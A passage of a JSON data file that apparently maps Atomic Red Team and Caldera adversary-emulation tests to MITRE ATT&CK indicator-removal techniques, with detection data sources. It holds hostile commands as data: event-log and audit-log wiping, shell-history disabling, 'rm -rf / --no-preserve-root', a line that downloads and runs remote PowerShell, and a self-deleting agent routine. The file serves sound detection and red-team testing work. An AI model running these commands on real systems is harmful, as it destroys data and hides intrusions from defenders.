], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1070.001", + "command_list": [ + "wevtutil cl System\n", + "$logs = Get-EventLog -List | ForEach-Object {$_.Log}\n$logs | ForEach-Object {Clear-EventLog -LogName $_ }\nGet-EventLog -list\n", + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing)\nInvoke-Maldoc -macroFile \"PathToAtomicsFolder\\T1070.001\\src\\T1070.001-macrocode.txt\" -officeProduct \"Word\" -sub \"ClearLogs\"\n", + "Clear-Eventlog Security;\nClear-Eventlog System;\n" + ], + "commands": [ + { + "command": "wevtutil cl System\n", + "source": "atomics/T1070.001/T1070.001.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Clear Windows Event Logs" + }, + { + "command": "$logs = Get-EventLog -List | ForEach-Object {$_.Log}\n$logs | ForEach-Object {Clear-EventLog -LogName $_ }\nGet-EventLog -list\n", + "source": "atomics/T1070.001/T1070.001.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Clear Windows Event Logs" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing)\nInvoke-Maldoc -macroFile \"PathToAtomicsFolder\\T1070.001\\src\\T1070.001-macrocode.txt\" -officeProduct \"Word\" -sub \"ClearLogs\"\n", + "source": "atomics/T1070.001/T1070.001.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Clear Windows Event Logs" + }, + { + "command": "Clear-Eventlog Security;\nClear-Eventlog System;\n", + "source": "data/abilities/defense-evasion/fcf71ee3-d1a9-4136-b919-9e5f6da43608.yml", + "name": "Clear Sysmon logs [intended to trigger CAR-2016-04-002]" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1070.001", + "display_name": "Indicator Removal on Host: Clear Windows Event Logs", + "atomic_tests": [ + { + "name": "Clear Logs", + "auto_generated_guid": "e6abb60e-26b8-41da-8aae-0c35174b0967", + "description": "Upon execution this test will clear Windows Event Logs. Open the System.evtx logs at C:\\Windows\\System32\\winevt\\Logs and verify that it is now empty.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "log_name": { + "description": "Windows Log Name, ex System", + "type": "String", + "default": "System" + } + }, + "executor": { + "command": "wevtutil cl #{log_name}\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Delete System Logs Using Clear-EventLog", + "auto_generated_guid": "b13e9306-3351-4b4b-a6e8-477358b0b498", + "description": "Clear event logs using built-in PowerShell commands.\nUpon successful execution, you should see the list of deleted event logs\nUpon execution, open the Security.evtx logs at C:\\Windows\\System32\\winevt\\Logs and verify that it is now empty or has very few logs in it.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$logs = Get-EventLog -List | ForEach-Object {$_.Log}\n$logs | ForEach-Object {Clear-EventLog -LogName $_ }\nGet-EventLog -list\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Clear Event Logs via VBA", + "auto_generated_guid": "1b682d84-f075-4f93-9a89-8a8de19ffd6e", + "description": "This module utilizes WMI via VBA to clear the Security and Backup eventlogs from the system. \n\nElevation is required for this module to execute properly, otherwise WINWORD will throw an \"Access Denied\" error\n", + "supported_platforms": [ + "windows" + ], + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Microsoft Word must be installed\n", + "prereq_command": "try {\n New-Object -COMObject \"Word.Application\" | Out-Null\n Stop-Process -Name \"winword\"\n exit 0\n} catch { exit 1 }\n", + "get_prereq_command": "Write-Host \"You will need to install Microsoft Word manually to meet this requirement\"\n" + } + ], + "executor": { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing)\nInvoke-Maldoc -macroFile \"PathToAtomicsFolder\\T1070.001\\src\\T1070.001-macrocode.txt\" -officeProduct \"Word\" -sub \"ClearLogs\"\n", + "name": "powershell", + "elevation_required": true + } + } + ] + }, + { + "id": "fcf71ee3-d1a9-4136-b919-9e5f6da43608", + "name": "Clear Logs", + "description": "Clear Sysmon logs [intended to trigger CAR-2016-04-002]", + "tactic": "defense-evasion", + "technique": { + "attack_id": "T1070.001", + "name": "Indicator Removal on Host: Clear Windows Event Logs" + }, + "privilege": "Elevated", + "platforms": { + "windows": { + "psh,pwsh": { + "command": "Clear-Eventlog Security;\nClear-Eventlog System;\n" + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1070.002", + "command_list": [ + "sudo rm -rf /private/var/log/system.log*\nsudo rm -rf /private/var/audit/*\n", + "echo 0> /var/spool/mail/root\n", + "echo 0> /var/log/secure\n" + ], + "commands": [ + { + "command": "sudo rm -rf /private/var/log/system.log*\nsudo rm -rf /private/var/audit/*\n", + "source": "atomics/T1070.002/T1070.002.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Clear Linux or Mac System Logs" + }, + { + "command": "echo 0> /var/spool/mail/root\n", + "source": "atomics/T1070.002/T1070.002.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Clear Linux or Mac System Logs" + }, + { + "command": "echo 0> /var/log/secure\n", + "source": "atomics/T1070.002/T1070.002.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Clear Linux or Mac System Logs" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1070.002", + "display_name": "Indicator Removal on Host: Clear Linux or Mac System Logs", + "atomic_tests": [ + { + "name": "rm -rf", + "auto_generated_guid": "989cc1b1-3642-4260-a809-54f9dd559683", + "description": "Delete system and audit logs\n", + "supported_platforms": [ + "macos", + "linux" + ], + "executor": { + "command": "sudo rm -rf /private/var/log/system.log*\nsudo rm -rf /private/var/audit/*\n", + "name": "sh", + "elevation_required": true + } + }, + { + "name": "Overwrite Linux Mail Spool", + "auto_generated_guid": "1602ff76-ed7f-4c94-b550-2f727b4782d4", + "description": "This test overwrites the Linux mail spool of a specified user. This technique was used by threat actor Rocke during the exploitation of Linux web servers.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "username": { + "description": "Username of mail spool", + "type": "String", + "default": "root" + } + }, + "executor": { + "command": "echo 0> /var/spool/mail/#{username}\n", + "name": "bash" + } + }, + { + "name": "Overwrite Linux Log", + "auto_generated_guid": "d304b2dc-90b4-4465-a650-16ddd503f7b5", + "description": "This test overwrites the specified log. This technique was used by threat actor Rocke during the exploitation of Linux web servers.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "log_path": { + "description": "Path of specified log", + "type": "Path", + "default": "/var/log/secure" + } + }, + "executor": { + "command": "echo 0> #{log_path}\n", + "name": "bash" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file deletion", + "description": "A file was deleted.", + "source_data_element": "process", + "relationship": "deleted", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file deletion", + "description": "A file was deleted.", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1070.003", + "command_list": [ + "rm ~/.bash_history\n", + "echo \"\" > ~/.bash_history\n", + "cat /dev/null > ~/.bash_history\n", + "ln -sf /dev/null ~/.bash_history\n", + "truncate -s0 ~/.bash_history\n", + "unset HISTFILE\nexport HISTFILESIZE=0\nhistory -c\n", + "set +o history\necho 'set +o history' >> ~/.bashrc\n. ~/.bashrc\nhistory -c\n", + "hostname\nwhoami\n", + "sshpass -p 'pwd101!' ssh testuser1@localhost -T hostname\n", + "Set-PSReadlineOption \u2013HistorySaveStyle SaveNothing\n", + "Remove-Item (Get-PSReadlineOption).HistorySavePath\n", + "> $HOME/.bash_history && unset HISTFILE\n", + "Clear-History;Clear" + ], + "commands": [ + { + "command": "rm ~/.bash_history\n", + "source": "atomics/T1070.003/T1070.003.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Clear Command History" + }, + { + "command": "echo \"\" > ~/.bash_history\n", + "source": "atomics/T1070.003/T1070.003.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Clear Command History" + }, + { + "command": "cat /dev/null > ~/.bash_history\n", + "source": "atomics/T1070.003/T1070.003.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Clear Command History" + }, + { + "command": "ln -sf /dev/null ~/.bash_history\n", + "source": "atomics/T1070.003/T1070.003.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Clear Command History" + }, + { + "command": "truncate -s0 ~/.bash_history\n", + "source": "atomics/T1070.003/T1070.003.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Clear Command History" + }, + { + "command": "unset HISTFILE\nexport HISTFILESIZE=0\nhistory -c\n", + "source": "atomics/T1070.003/T1070.003.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Clear Command History" + }, + { + "command": "set +o history\necho 'set +o history' >> ~/.bashrc\n. ~/.bashrc\nhistory -c\n", + "source": "atomics/T1070.003/T1070.003.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Clear Command History" + }, + { + "command": "hostname\nwhoami\n", + "source": "atomics/T1070.003/T1070.003.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Clear Command History" + }, + { + "command": "sshpass -p 'pwd101!' ssh testuser1@localhost -T hostname\n", + "source": "atomics/T1070.003/T1070.003.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Clear Command History" + }, + { + "command": "Set-PSReadlineOption \u2013HistorySaveStyle SaveNothing\n", + "source": "atomics/T1070.003/T1070.003.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Clear Command History" + }, + { + "command": "Remove-Item (Get-PSReadlineOption).HistorySavePath\n", + "source": "atomics/T1070.003/T1070.003.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Clear Command History" + }, + { + "command": "> $HOME/.bash_history && unset HISTFILE\n", + "source": "data/abilities/defense-evasion/43b3754c-def4-4699-a673-1d85648fda6a.yml", + "name": "Stop terminal from logging history" + }, + { + "command": "Clear-History;Clear", + "source": "data/abilities/defense-evasion/43b3754c-def4-4699-a673-1d85648fda6a.yml", + "name": "Stop terminal from logging history" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1070.003", + "display_name": "Indicator Removal on Host: Clear Command History", + "atomic_tests": [ + { + "name": "Clear Bash history (rm)", + "auto_generated_guid": "a934276e-2be5-4a36-93fd-98adbb5bd4fc", + "description": "Clears bash history via rm\n", + "supported_platforms": [ + "linux", + "macos" + ], + "executor": { + "command": "rm ~/.bash_history\n", + "name": "sh" + } + }, + { + "name": "Clear Bash history (echo)", + "auto_generated_guid": "cbf506a5-dd78-43e5-be7e-a46b7c7a0a11", + "description": "Clears bash history via rm\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "echo \"\" > ~/.bash_history\n", + "name": "sh" + } + }, + { + "name": "Clear Bash history (cat dev/null)", + "auto_generated_guid": "b1251c35-dcd3-4ea1-86da-36d27b54f31f", + "description": "Clears bash history via cat /dev/null\n", + "supported_platforms": [ + "linux", + "macos" + ], + "executor": { + "command": "cat /dev/null > ~/.bash_history\n", + "name": "sh" + } + }, + { + "name": "Clear Bash history (ln dev/null)", + "auto_generated_guid": "23d348f3-cc5c-4ba9-bd0a-ae09069f0914", + "description": "Clears bash history via a symlink to /dev/null\n", + "supported_platforms": [ + "linux", + "macos" + ], + "executor": { + "command": "ln -sf /dev/null ~/.bash_history\n", + "name": "sh" + } + }, + { + "name": "Clear Bash history (truncate)", + "auto_generated_guid": "47966a1d-df4f-4078-af65-db6d9aa20739", + "description": "Clears bash history via truncate\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "truncate -s0 ~/.bash_history\n", + "name": "sh" + } + }, + { + "name": "Clear history of a bunch of shells", + "auto_generated_guid": "7e6721df-5f08-4370-9255-f06d8a77af4c", + "description": "Clears the history of a bunch of different shell types by setting the history size to zero\n", + "supported_platforms": [ + "linux", + "macos" + ], + "executor": { + "command": "unset HISTFILE\nexport HISTFILESIZE=0\nhistory -c\n", + "name": "sh" + } + }, + { + "name": "Clear and Disable Bash History Logging", + "auto_generated_guid": "784e4011-bd1a-4ecd-a63a-8feb278512e6", + "description": "Clears the history and disable bash history logging of the current shell and future shell sessions\n", + "supported_platforms": [ + "linux", + "macos" + ], + "executor": { + "command": "set +o history\necho 'set +o history' >> ~/.bashrc\n. ~/.bashrc\nhistory -c\n", + "cleanup_command": "sed -i 's/set +o history//g' ~/.bashrc\n. ~/.bashrc\nset -o history\n", + "name": "sh" + } + }, + { + "name": "Use Space Before Command to Avoid Logging to History", + "auto_generated_guid": "53b03a54-4529-4992-852d-a00b4b7215a6", + "description": "Using a space before a command causes the command to not be logged in the Bash History file\n", + "supported_platforms": [ + "linux", + "macos" + ], + "executor": { + "command": "hostname\nwhoami\n", + "name": "sh" + } + }, + { + "name": "Disable Bash History Logging with SSH -T", + "auto_generated_guid": "5f8abd62-f615-43c5-b6be-f780f25790a1", + "description": "Keeps history clear and stays out of lastlog,wtmp,btmp ssh -T keeps the ssh client from catching a proper TTY, which is what usually gets logged on lastlog\n", + "supported_platforms": [ + "linux" + ], + "dependencies": [ + { + "description": "Install sshpass and create user account used for excuting\n", + "prereq_command": "$(getent passwd testuser1 >/dev/null) && $(which sshpass >/dev/null)\n", + "get_prereq_command": "/usr/sbin/useradd testuser1\necho -e 'pwd101!\\npwd101!' | passwd testuser1\n(which yum && yum -y install epel-release sshpass)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y sshpass)\n" + } + ], + "executor": { + "command": "sshpass -p 'pwd101!' ssh testuser1@localhost -T hostname\n", + "cleanup_command": "userdel -f testuser1\n", + "name": "sh" + } + }, + { + "name": "Prevent Powershell History Logging", + "auto_generated_guid": "2f898b81-3e97-4abb-bc3f-a95138988370", + "description": "Prevents Powershell history\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Set-PSReadlineOption \u2013HistorySaveStyle SaveNothing\n", + "name": "powershell", + "cleanup_command": "Set-PSReadLineOption -HistorySaveStyle SaveIncrementally" + } + }, + { + "name": "Clear Powershell History by Deleting History File", + "auto_generated_guid": "da75ae8d-26d6-4483-b0fe-700e4df4f037", + "description": "Clears Powershell history\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Remove-Item (Get-PSReadlineOption).HistorySavePath\n", + "name": "powershell" + } + } + ] + }, + { + "id": "43b3754c-def4-4699-a673-1d85648fda6a", + "name": "Avoid logs", + "description": "Stop terminal from logging history", + "tactic": "defense-evasion", + "technique": { + "attack_id": "T1070.003", + "name": "Indicator Removal on Host: Clear Command History" + }, + "platforms": { + "darwin": { + "sh": { + "command": "> $HOME/.bash_history && unset HISTFILE\n" + } + }, + "linux": { + "sh": { + "command": "> $HOME/.bash_history && unset HISTFILE\n" + } + }, + "windows": { + "psh": { + "command": "Clear-History;Clear" + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file deletion", + "description": "A file was deleted.", + "source_data_element": "process", + "relationship": "deleted", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file deletion", + "description": "A file was deleted.", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1070.004", + "command_list": [ + "rm -f /tmp/victim-files/a\n", + "rm -rf /tmp/victim-files\n", + "shred -u /tmp/victim-shred.txt\n", + "del /f %temp%\\deleteme_T1551.004\n", + "rmdir /s /q %temp%\\deleteme_T1551.004\n", + "Remove-Item -path $env:TEMP\\deleteme_T1551.004\n", + "Remove-Item -Path $env:TEMP\\deleteme_folder_T1551.004 -Recurse\n", + "rm -rf / --no-preserve-root > /dev/null 2> /dev/null\n", + "Remove-Item -Path (Join-Path \"$Env:SystemRoot\\prefetch\\\" (Get-ChildItem -Path \"$Env:SystemRoot\\prefetch\\*.pf\" -Name)[0])\n", + "Remove-Item $env:TEMP\\TeamViewer_54.log\n", + "$startupClass = Get-CimClass -ClassName Win32_ProcessStartup;\n$startupInfo = New-CimInstance -CimClass $startupClass -Property @{ShowWindow = 0} -ClientOnly;\n$processClass = Get-CimClass -ClassName Win32_Process;\nInvoke-CimMethod -CimClass $processClass -MethodName Create -Arguments @{\n Commandline = 'cmd.exe /c \"timeout /nobreak /t 10 >nul 2>nul & del /f #{location}\"';\n ProcessStartupInformation = [CimInstance]$startupInfo\n};\n", + "path=\"$(pwd)/#{exe_name}\";\nnum_processes=$(for id in $(pgrep -f #{exe_name}); do lsof -p $id 2> /dev/null | grep \"$path\"; done | wc -l);\nif [ \"$num_processes\" -le 1 ]; then /bin/rm -f \"$path\"; fi;\n", + "path=\"$(pwd)/#{exe_name}\";\nnum_processes=$(for id in $(pgrep -f #{exe_name}); do lsof -p $id 2> /dev/null | grep \"$path\"; done | wc -l);\nif [ \"$num_processes\" -le 1 ]; then /bin/rm -f \"$path\"; fi;" + ], + "commands": [ + { + "command": "rm -f /tmp/victim-files/a\n", + "source": "atomics/T1070.004/T1070.004.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: File Deletion" + }, + { + "command": "rm -rf /tmp/victim-files\n", + "source": "atomics/T1070.004/T1070.004.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: File Deletion" + }, + { + "command": "shred -u /tmp/victim-shred.txt\n", + "source": "atomics/T1070.004/T1070.004.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: File Deletion" + }, + { + "command": "del /f %temp%\\deleteme_T1551.004\n", + "source": "atomics/T1070.004/T1070.004.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: File Deletion" + }, + { + "command": "rmdir /s /q %temp%\\deleteme_T1551.004\n", + "source": "atomics/T1070.004/T1070.004.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: File Deletion" + }, + { + "command": "Remove-Item -path $env:TEMP\\deleteme_T1551.004\n", + "source": "atomics/T1070.004/T1070.004.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: File Deletion" + }, + { + "command": "Remove-Item -Path $env:TEMP\\deleteme_folder_T1551.004 -Recurse\n", + "source": "atomics/T1070.004/T1070.004.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: File Deletion" + }, + { + "command": "rm -rf / --no-preserve-root > /dev/null 2> /dev/null\n", + "source": "atomics/T1070.004/T1070.004.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: File Deletion" + }, + { + "command": "Remove-Item -Path (Join-Path \"$Env:SystemRoot\\prefetch\\\" (Get-ChildItem -Path \"$Env:SystemRoot\\prefetch\\*.pf\" -Name)[0])\n", + "source": "atomics/T1070.004/T1070.004.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: File Deletion" + }, + { + "command": "Remove-Item $env:TEMP\\TeamViewer_54.log\n", + "source": "atomics/T1070.004/T1070.004.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: File Deletion" + }, + { + "command": "$startupClass = Get-CimClass -ClassName Win32_ProcessStartup;\n$startupInfo = New-CimInstance -CimClass $startupClass -Property @{ShowWindow = 0} -ClientOnly;\n$processClass = Get-CimClass -ClassName Win32_Process;\nInvoke-CimMethod -CimClass $processClass -MethodName Create -Arguments @{\n Commandline = 'cmd.exe /c \"timeout /nobreak /t 10 >nul 2>nul & del /f #{location}\"';\n ProcessStartupInformation = [CimInstance]$startupInfo\n};\n", + "source": "data/abilities/defense-evasion/5f844ac9-5f24-4196-a70d-17f0bd44a934.yml", + "name": "Deadman ability to delete agent file after termination." + }, + { + "command": "path=\"$(pwd)/#{exe_name}\";\nnum_processes=$(for id in $(pgrep -f #{exe_name}); do lsof -p $id 2> /dev/null | grep \"$path\"; done | wc -l);\nif [ \"$num_processes\" -le 1 ]; then /bin/rm -f \"$path\"; fi;\n", + "source": "data/abilities/defense-evasion/5f844ac9-5f24-4196-a70d-17f0bd44a934.yml", + "name": "Deadman ability to delete agent file after termination." + }, + { + "command": "path=\"$(pwd)/#{exe_name}\";\nnum_processes=$(for id in $(pgrep -f #{exe_name}); do lsof -p $id 2> /dev/null | grep \"$path\"; done | wc -l);\nif [ \"$num_processes\" -le 1 ]; then /bin/rm -f \"$path\"; fi;", + "source": "data/abilities/defense-evasion/5f844ac9-5f24-4196-a70d-17f0bd44a934.yml", + "name": "Deadman ability to delete agent file after termination." + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1070.004", + "display_name": "Indicator Removal on Host: File Deletion", + "atomic_tests": [ + { + "name": "Delete a single file - Linux/macOS", + "auto_generated_guid": "562d737f-2fc6-4b09-8c2a-7f8ff0828480", + "description": "Delete a single file from the temporary directory\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "file_to_delete": { + "description": "Path of file to delete", + "type": "Path", + "default": "/tmp/victim-files/a" + } + }, + "executor": { + "command": "rm -f #{file_to_delete}\n", + "name": "sh" + } + }, + { + "name": "Delete an entire folder - Linux/macOS", + "auto_generated_guid": "a415f17e-ce8d-4ce2-a8b4-83b674e7017e", + "description": "Recursively delete the temporary directory and all files contained within it\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "folder_to_delete": { + "description": "Path of folder to delete", + "type": "Path", + "default": "/tmp/victim-files" + } + }, + "executor": { + "command": "rm -rf #{folder_to_delete}\n", + "name": "sh" + } + }, + { + "name": "Overwrite and delete a file with shred", + "auto_generated_guid": "039b4b10-2900-404b-b67f-4b6d49aa6499", + "description": "Use the `shred` command to overwrite the temporary file and then delete it\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "file_to_shred": { + "description": "Path of file to shred", + "type": "Path", + "default": "/tmp/victim-shred.txt" + } + }, + "executor": { + "command": "shred -u 